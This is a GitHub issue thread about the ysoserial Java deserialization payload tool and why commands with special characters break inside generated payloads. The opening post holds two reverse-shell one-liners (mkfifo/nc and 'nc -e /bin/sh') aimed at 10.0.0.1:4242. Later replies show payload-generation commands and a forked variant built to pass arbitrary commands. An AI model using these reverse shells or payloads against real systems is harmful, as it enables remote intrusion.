
The 'command' can't have special characters? #147

Closed
A1vinSmith opened this issue Dec 12, 2020 · 7 comments

Comments

@A1vinSmith

It's not working:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f

But nc -e /bin/sh 10.0.0.1 4242 is working.

My question is: which characters cannot be used in the cmd? ;, > and/or |?

@A1vinSmith
Author

Another related question is how to use those raw input files, like .elf and .war?
I tried to put the file name instead of the command. Apparently no joy.

@zeroSteiner

I'm running into an issue that I think is related to special characters as well. Specifically, while using the CommonsBeanutils1 payload, ysoserial crashes when the command has a " character in it. This is the case with many command payloads that are generated by Metasploit.

java -jar ysoserial-master-138dc36bd2-1.jar CommonsBeanutils1 'python -c "FOO"' | xxd -g 1 
Error while generating or serializing payload
javassist.CannotCompileException: [source error] ) is missing
	at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:120)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
	at ysoserial.payloads.CommonsBeanutils1.getObject(CommonsBeanutils1.java:20)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: compile error: ) is missing
	at javassist.compiler.Parser.parseArgumentList(Parser.java:1340)
	at javassist.compiler.Parser.parseMethodCall(Parser.java:1180)
	at javassist.compiler.Parser.parsePostfix(Parser.java:1036)
	at javassist.compiler.Parser.parseUnaryExpr(Parser.java:888)
	at javassist.compiler.Parser.parseBinaryExpr(Parser.java:775)
	at javassist.compiler.Parser.parseConditionalExpr(Parser.java:719)
	at javassist.compiler.Parser.parseExpression(Parser.java:699)
	at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:591)
	at javassist.compiler.Parser.parseStatement(Parser.java:277)
	at javassist.compiler.Javac.compileStmnt(Javac.java:567)
	at javassist.CtBehavior.insertAfterAdvice(CtBehavior.java:892)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:851)
	... 5 more

@A1vinSmith
Author

Thank you for linking them @zeroSteiner.
I saw this: https://github.com/rapid7/metasploit-framework/wiki/Generating-%60ysoserial%60-Java-serialized-objects
Does that mean we still can't do java -jar ysoserial-master-138dc36bd2-1.jar CommonsBeanutils1 'python -c "FOO"' | xxd -g 1, and the solution is for Metasploit's future payloads only?

@federicodotta

Hi @A1vinSmith ,

many ysoserial gadgets use the Runtime.exec(String) method, which works with any target (Windows, Linux, etc.) but does not work with many special chars.

One solution can be to try to convert your command using this workaround:
http://www.jackson-t.ca/runtime-exec-payloads.html

Alternatively, I forked the repository and added a variation of the payloads that allow all the chars when exploiting Linux or Windows targets, but you have to choose between Windows and Linux when you generate the payload. You can find the build here: https://github.com/federicodotta/ysoserial

You can generate payloads for Windows/Linux as follows:
java -jar ysoserial-fd-0.0.6.jar CommonsCollections1 "echo AAA > a.txt" exec_win
java -jar ysoserial-fd-0.0.6.jar CommonsCollections1 "echo AAA > a.txt" exec_unix

Federico

@A1vinSmith
Author

Thank you @federicodotta
Why not create a PR (maybe with another branch if they're concerned about the API changes) for ysoserial?

@federicodotta

Hi @A1vinSmith,

Because unfortunately my changes don't apply to all the gadgets, but only to a subset of them. In some gadgets it is not possible to add the other modes (sleep, dns, exec_win, exec_unix, etc.), and for this reason I chose to make a "quick and dirty" mod to a fork of the tool.

Federico

@frohoff
Owner

frohoff commented Aug 17, 2021

The specific bug causing the problem reported by @zeroSteiner has been resolved in #151.

frohoff closed this as completed Mar 5, 2022